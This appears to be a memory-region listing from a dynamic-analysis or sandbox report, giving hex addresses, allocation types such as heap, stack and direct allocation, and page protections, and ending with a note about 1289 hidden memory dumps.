heap
page read and write
44A0000
direct allocation
page read and write
3B32DFB000
stack
page read and write
31AE000
heap
page read and write
6C4000
heap
page read and write
724E000
stack
page read and write
1152000
heap
page read and write
3ADE000
stack
page read and write
6C4000
heap
page read and write
4B20000
direct allocation
page execute and read and write
2BD0000
direct allocation
page read and write
104B000
heap
page read and write
3B324FE000
unkown
page readonly
7FF936430000
trusted library allocation
page execute and read and write
1C93A65B000
heap
page read and write
310E000
stack
page read and write
AB0000
unkown
page readonly
38FE000
stack
page read and write
348F000
stack
page read and write
285F000
stack
page read and write
61B000
heap
page read and write
10F9000
heap
page read and write
12FD000
stack
page read and write
1049000
heap
page read and write
417F000
stack
page read and write
20F42C00000
heap
page read and write
21743D30000
trusted library allocation
page execute
1159000
heap
page read and write
1504000
heap
page read and write
A10000
unkown
page readonly
2C70C476000
heap
page read and write
10CB000
heap
page read and write
4F20000
direct allocation
page execute and read and write
4EB0000
direct allocation
page execute and read and write
20F412D2000
heap
page read and write
1073000
heap
page read and write
1C93FB40000
trusted library allocation
page read and write
3189000
trusted library allocation
page read and write
96E000
stack
page read and write
AB1000
unkown
page execute and write copy
3258000
heap
page read and write
1690000
direct allocation
page read and write
3A9F000
stack
page read and write
21742F6E000
heap
page read and write
428E000
stack
page read and write
116F000
stack
page read and write
77DE000
heap
page read and write
3240000
trusted library allocation
page execute and read and write
7FF9364D0000
trusted library allocation
page read and write
1C93FBF0000
remote allocation
page read and write
787E000
heap
page read and write
31E1000
heap
page read and write
21743CD5000
trusted library allocation
page read and write
1620000
direct allocation
page read and write
706E000
stack
page read and write
1052000
heap
page read and write
580B000
stack
page read and write
7FF936550000
trusted library allocation
page read and write
10A6000
heap
page read and write
2C70DD80000
heap
page readonly
D76000
unkown
page execute and read and write
FF2000
heap
page read and write
7DF495050000
trusted library allocation
page execute and read and write
720E000
stack
page read and write
53F0000
direct allocation
page execute and read and write
20F41291000
heap
page read and write
7456000
trusted library allocation
page read and write
20F412D2000
heap
page read and write
4AD0000
direct allocation
page execute and read and write
2C70DD90000
trusted library allocation
page read and write
1C93A5C0000
trusted library allocation
page read and write
2A4000
unkown
page readonly
31EE000
heap
page read and write
3B7E000
stack
page read and write
8230000
heap
page read and write
781A000
heap
page read and write
59ED000
stack
page read and write
53D0000
direct allocation
page execute and read and write
20F4128C000
heap
page read and write
4AC0000
direct allocation
page execute and read and write
55FF000
trusted library allocation
page read and write
4AC0000
direct allocation
page execute and read and write
4AC0000
direct allocation
page execute and read and write
1C93F9E0000
trusted library allocation
page read and write
3E8F000
stack
page read and write
21743BF4000
heap
page read and write
1C93A490000
heap
page read and write
4E01000
heap
page read and write
FFB000
heap
page read and write
7FF936460000
trusted library allocation
page read and write
5DB0000
heap
page read and write
20F41180000
heap
page read and write
4890000
heap
page read and write
63AC000
heap
page read and write
6C4000
heap
page read and write
521B000
trusted library allocation
page read and write
20F41288000
heap
page read and write
53A3000
trusted library allocation
page read and write
7145000
heap
page execute and read and write
105D000
heap
page read and write
3B319FE000
stack
page read and write
31E7000
heap
page read and write
110F000
heap
page read and write
31D8000
heap
page read and write
691000
heap
page read and write
4B8C000
stack
page read and write
4E70000
direct allocation
page execute and read and write
1C93FC8D000
heap
page read and write
63B1000
heap
page read and write
32BE000
stack
page read and write
4E01000
heap
page read and write
41BE000
stack
page read and write
44A0000
direct allocation
page read and write
CA0000
unkown
page execute and read and write
7AE0000
trusted library allocation
page read and write
20F412A8000
heap
page read and write
1504000
heap
page read and write
7E7E000
stack
page read and write
740E000
stack
page read and write
424F000
stack
page read and write
3B3347E000
stack
page read and write
1C93AE00000
heap
page read and write
3B334FE000
unkown
page readonly
20F410A0000
heap
page read and write
4AE0000
direct allocation
page execute and read and write
20F412A8000
heap
page read and write
20F412C5000
heap
page read and write
31AE000
heap
page read and write
1046000
heap
page read and write
20F412E1000
heap
page read and write
10BE000
heap
page read and write
20F41270000
heap
page read and write
783E000
heap
page read and write
1C93B590000
trusted library allocation
page read and write
ECB2BFE000
stack
page read and write
FF2000
heap
page read and write
1164000
heap
page read and write
77EF000
heap
page read and write
64AE000
trusted library allocation
page read and write
3210000
heap
page read and write
2C70E320000
heap
page execute and read and write
764E000
stack
page read and write
1C93B340000
trusted library allocation
page read and write
7FF936442000
trusted library allocation
page read and write
666000
heap
page read and write
3B321FB000
stack
page read and write
643000
heap
page read and write
453F000
stack
page read and write
984000
heap
page read and write
7FF936480000
trusted library allocation
page read and write
6C4000
heap
page read and write
4A90000
direct allocation
page execute and read and write
20F41237000
heap
page read and write
2BD0000
direct allocation
page read and write
6AFC000
stack
page read and write
CA0000
unkown
page execute and read and write
AA0000
heap
page read and write
FF3000
heap
page read and write
6C4000
heap
page read and write
6BFD000
stack
page read and write
2C71E3A0000
trusted library allocation
page read and write
106D000
heap
page read and write
292000
unkown
page readonly
4891000
heap
page read and write
338E000
stack
page read and write
6C4000
heap
page read and write
53F0000
direct allocation
page execute and read and write
2C70E310000
heap
page execute and read and write
10B8000
heap
page read and write
16AA000
heap
page read and write
1620000
direct allocation
page read and write
669000
heap
page read and write
44B1000
heap
page read and write
FF3000
heap
page read and write
E3DB5F7000
stack
page read and write
4F00000
direct allocation
page execute and read and write
2BD0000
direct allocation
page read and write
31D2000
heap
page read and write
2C70FA1C000
trusted library allocation
page read and write
26C000
unkown
page readonly
2C70DD70000
trusted library allocation
page read and write
3191000
heap
page read and write
11AE000
stack
page read and write
1C93FBA0000
trusted library allocation
page read and write
438F000
stack
page read and write
20F412C5000
heap
page read and write
663000
heap
page read and write
388E000
stack
page read and write
4B60000
direct allocation
page execute and read and write
2C70C350000
heap
page read and write
884E000
stack
page read and write
984000
heap
page read and write
F51000
unkown
page execute and read and write
601F000
stack
page read and write
371E000
stack
page read and write
21743CE5000
trusted library allocation
page read and write
4C2E000
stack
page read and write
6C4000
heap
page read and write
1C93FC41000
heap
page read and write
2C70C44F000
heap
page read and write
1C93AE02000
heap
page read and write
9B0000
heap
page read and write
327F000
stack
page read and write
1C93FAE1000
trusted library allocation
page read and write
317E000
heap
page read and write
7AD0000
trusted library allocation
page read and write
7C40000
heap
page read and write
1069000
heap
page read and write
2BD0000
direct allocation
page read and write
2F8F000
stack
page read and write
21743BEB000
heap
page read and write
5D7000
heap
page read and write
ECB27E6000
stack
page read and write
3B31DFB000
stack
page read and write
3B31CFE000
unkown
page readonly
AB0000
unkown
page read and write
20F412D2000
heap
page read and write
20F414A0000
trusted library allocation
page read and write
4EC0000
direct allocation
page execute and read and write
1C93FC00000
heap
page read and write
10C8000
heap
page read and write
D1D000
unkown
page execute and write copy
984000
heap
page read and write
2BD0000
direct allocation
page read and write
4E01000
heap
page read and write
2BD0000
direct allocation
page read and write
107F000
heap
page read and write
3E5F000
stack
page read and write
FC8000
heap
page read and write
115D000
heap
page read and write
5470000
direct allocation
page execute and read and write
1C93FC1F000
heap
page read and write
43CE000
stack
page read and write
106C000
heap
page read and write
684000
heap
page read and write
1C93FCE3000
heap
page read and write
44CF000
stack
page read and write
1C93A702000
heap
page read and write
3170000
trusted library allocation
page read and write
21743BE2000
heap
page read and write
FE2000
heap
page read and write
20F4128C000
heap
page read and write
21743BF3000
heap
page read and write
5420000
direct allocation
page execute and read and write
1504000
heap
page read and write
FE4000
heap
page read and write
4DFF000
stack
page read and write
1C93A6AD000
heap
page read and write
3B3247E000
stack
page read and write
E3DB77E000
stack
page read and write
10B8000
heap
page read and write
31F6000
heap
page read and write
FF3000
heap
page read and write
2BF0000
direct allocation
page read and write
63A0000
heap
page read and write
7950000
trusted library allocation
page execute and read and write
20F412D2000
heap
page read and write
6C4000
heap
page read and write
1080000
heap
page read and write
9C7000
heap
page read and write
3E9E000
stack
page read and write
760E000
stack
page read and write
4CBF000
stack
page read and write
3D8E000
stack
page read and write
10F3000
heap
page read and write
984000
heap
page read and write
2F9E000
stack
page read and write
4AA0000
direct allocation
page execute and read and write
580000
heap
page read and write
CD6000
unkown
page execute and read and write
2C726690000
heap
page read and write
1C93A62B000
heap
page read and write
349E000
stack
page read and write
6C4000
heap
page read and write
D0E000
unkown
page execute and read and write
E3DB4FD000
stack
page read and write
3220000
heap
page readonly
7FF93626D000
trusted library allocation
page execute and read and write
3B323FE000
unkown
page readonly
4E60000
direct allocation
page execute and read and write
2F20000
heap
page read and write
307E000
stack
page read and write
43FF000
stack
page read and write
411E000
stack
page read and write
31A5000
trusted library allocation
page execute and read and write
21743BF1000
heap
page read and write
101D000
heap
page read and write
421F000
stack
page read and write
53F0000
direct allocation
page execute and read and write
7864000
heap
page read and write
984000
heap
page read and write
44B1000
heap
page read and write
31E0000
heap
page read and write
6550000
trusted library allocation
page read and write
1C93A676000
heap
page read and write
7FF936530000
trusted library allocation
page read and write
FEC000
stack
page read and write
2C71E61A000
trusted library allocation
page read and write
1C93FB40000
trusted library allocation
page read and write
20F41200000
trusted library allocation
page read and write
1C93FBB0000
trusted library allocation
page read and write
A10000
unkown
page read and write
31F3000
heap
page read and write
1C93FCF5000
heap
page read and write
1C93AF02000
heap
page read and write
2C70C3E0000
trusted library allocation
page read and write
1C93FBF0000
remote allocation
page read and write
4AC0000
direct allocation
page execute and read and write
4E01000
heap
page read and write
A11000
unkown
page execute and write copy
4F00000
trusted library allocation
page read and write
2E6C000
stack
page read and write
30CF000
stack
page read and write
167E000
stack
page read and write
864E000
stack
page read and write
1051000
heap
page read and write
1C93FD04000
heap
page read and write
10D3000
heap
page read and write
4EA0000
heap
page read and write
1C93A641000
heap
page read and write
2BD0000
direct allocation
page read and write
4990000
trusted library allocation
page read and write
77C0000
heap
page read and write
1165000
heap
page read and write
478E000
stack
page read and write
5CA000
stack
page read and write
313F000
stack
page read and write
1C93FAB0000
trusted library allocation
page read and write
629F000
stack
page read and write
7FF936420000
trusted library allocation
page execute and read and write
1C93A600000
heap
page read and write
6C4000
heap
page read and write
7FF9364C0000
trusted library allocation
page read and write
1055000
heap
page read and write
3B32AFE000
unkown
page readonly
2FE0000
heap
page read and write
FF3000
heap
page read and write
2C70C330000
heap
page read and write
FDF000
heap
page read and write
D8E000
stack
page read and write
20F412E1000
heap
page read and write
4E70000
heap
page read and write
7FF9364A0000
trusted library allocation
page read and write
4B40000
direct allocation
page execute and read and write
113B000
heap
page read and write
20F412D2000
heap
page read and write
4BBE000
stack
page read and write
5AF0000
trusted library allocation
page read and write
602000
heap
page read and write
108C000
heap
page read and write
8C8D000
stack
page read and write
8540000
trusted library allocation
page read and write
B1F000
unkown
page execute and read and write
2BF0000
direct allocation
page read and write
7FF936263000
trusted library allocation
page execute and read and write
1C93B9B1000
trusted library allocation
page read and write
20F412F1000
heap
page read and write
1099000
heap
page read and write
590F000
stack
page read and write
C00000
unkown
page execute and read and write
7FF936520000
trusted library allocation
page read and write
3D1F000
stack
page read and write
29C000
unkown
page write copy
3B31AFE000
unkown
page readonly
1C93FA71000
trusted library allocation
page read and write
450E000
stack
page read and write
1C93FAB0000
trusted library allocation
page read and write
7FF9365A0000
trusted library allocation
page read and write
21743BF1000
heap
page read and write
363F000
stack
page read and write
21743BF1000
heap
page read and write
1C93A679000
heap
page read and write
31B9000
heap
page read and write
217431A1000
trusted library allocation
page read and write
21743BD8000
heap
page read and write
10A2000
heap
page read and write
984000
heap
page read and write
3B3237E000
stack
page read and write
2A8E000
stack
page read and write
984000
heap
page read and write
1C93FA50000
trusted library allocation
page read and write
2C70C435000
heap
page read and write
D76000
unkown
page execute and read and write
1504000
heap
page read and write
1167000
heap
page read and write
2D0F000
stack
page read and write
E3DAF0E000
stack
page read and write
149E000
stack
page read and write
7AC0000
trusted library allocation
page read and write
12AF000
stack
page read and write
85F0000
heap
page read and write
2E5E000
stack
page read and write
54A0000
direct allocation
page execute and read and write
784C000
heap
page read and write
7D7E000
stack
page read and write
52A0000
heap
page read and write
ECB359B000
stack
page read and write
403F000
stack
page read and write
449F000
stack
page read and write
4E80000
heap
page read and write
30C0000
heap
page read and write
1504000
heap
page read and write
624000
heap
page read and write
7940000
trusted library allocation
page read and write
72D1000
heap
page read and write
1620000
direct allocation
page read and write
3171000
heap
page read and write
3A3E000
stack
page read and write
4EA6000
heap
page read and write
44B1000
heap
page read and write
3DFE000
stack
page read and write
20F4128C000
heap
page read and write
78A0000
trusted library allocation
page read and write
10A6000
heap
page read and write
14DE000
stack
page read and write
5CC000
stack
page read and write
669000
heap
page read and write
2E4F000
stack
page read and write
66F000
heap
page read and write
1C93FCEE000
heap
page read and write
47FE000
stack
page read and write
3B3257E000
stack
page read and write
31F3000
heap
page read and write
1173000
heap
page read and write
6C4000
heap
page read and write
31A0000
trusted library allocation
page read and write
76A2000
heap
page read and write
DBD000
unkown
page execute and read and write
7FF936264000
trusted library allocation
page read and write
103D000
heap
page read and write
10F4000
heap
page read and write
A7D000
unkown
page write copy
3B322FE000
unkown
page readonly
78C0000
trusted library allocation
page read and write
31EA000
heap
page read and write
4AC0000
direct allocation
page execute and read and write
1148000
heap
page read and write
1043000
heap
page read and write
2FE5000
heap
page read and write
1C93FC4E000
heap
page read and write
7FF936560000
trusted library allocation
page read and write
7470000
trusted library allocation
page read and write
3350000
heap
page read and write
31F6000
heap
page read and write
20F41292000
heap
page read and write
2F5F000
stack
page read and write
2C7263D1000
heap
page read and write
20F412F2000
heap
page read and write
E3DB3FF000
stack
page read and write
7FF9364F0000
trusted library allocation
page read and write
77A0000
heap
page read and write
6C4000
heap
page read and write
1C93A6FE000
heap
page read and write
1C93A68D000
heap
page read and write
115B000
heap
page read and write
66D0000
trusted library allocation
page execute
2C00000
heap
page read and write
2B8F000
stack
page read and write
68B0000
heap
page read and write
21743CD0000
trusted library allocation
page read and write
6860000
heap
page read and write
70EF000
stack
page read and write
7B30000
trusted library allocation
page read and write
77E6000
heap
page read and write
44A0000
direct allocation
page read and write
20F42C04000
heap
page read and write
63A5000
heap
page read and write
6740000
heap
page read and write
687000
heap
page read and write
6C4000
heap
page read and write
2C70E331000
trusted library allocation
page read and write
21743BEB000
heap
page read and write
64AC000
trusted library allocation
page read and write
20F41291000
heap
page read and write
2C71E331000
trusted library allocation
page read and write
20F4124D000
heap
page read and write
E3DB8FE000
stack
page read and write
984000
heap
page read and write
3191000
heap
page read and write
1620000
direct allocation
page read and write
327C000
heap
page read and write
619E000
stack
page read and write
6C4000
heap
page read and write
20F412E1000
heap
page read and write
320E000
stack
page read and write
8D4C000
stack
page read and write
3B31EFE000
unkown
page readonly
1C93A692000
heap
page read and write
1620000
direct allocation
page read and write
5400000
direct allocation
page execute and read and write
345F000
stack
page read and write
790D000
stack
page read and write
460F000
stack
page read and write
3B320FE000
unkown
page readonly
488F000
stack
page read and write
374E000
stack
page read and write
21743BEB000
heap
page read and write
6C4000
heap
page read and write
21743D50000
heap
page readonly
312E000
stack
page read and write
20F412F2000
heap
page read and write
664000
heap
page read and write
3CBE000
stack
page read and write
103D000
heap
page read and write
336A000
heap
page read and write
3B32FFE000
stack
page read and write
10F6000
heap
page read and write
A76000
unkown
page execute and read and write
6C4000
heap
page read and write
17BE000
stack
page read and write
4E80000
direct allocation
page execute and read and write
2C726706000
heap
page read and write
6C4000
heap
page read and write
1504000
heap
page read and write
3168000
heap
page read and write
605E000
stack
page read and write
10A7000
heap
page read and write
1C93AF00000
heap
page read and write
31EE000
heap
page read and write
113F000
heap
page read and write
2C7264F0000
heap
page read and write
39CE000
stack
page read and write
1C93FB50000
trusted library allocation
page read and write
DA2000
unkown
page execute and read and write
7960000
heap
page execute and read and write
1C93FC0F000
heap
page read and write
2C7265D0000
heap
page execute and read and write
1C93B490000
trusted library section
page readonly
6C4000
heap
page read and write
2BD0000
direct allocation
page read and write
2E1F000
stack
page read and write
33FE000
stack
page read and write
5010000
heap
page read and write
960000
heap
page read and write
4F10000
direct allocation
page execute and read and write
2BCD000
stack
page read and write
E3DB577000
stack
page read and write
4AC0000
direct allocation
page execute and read and write
359F000
stack
page read and write
E3DB2FE000
stack
page read and write
2B19000
stack
page read and write
1504000
heap
page read and write
There are 1289 hidden memdumps, click here to show them.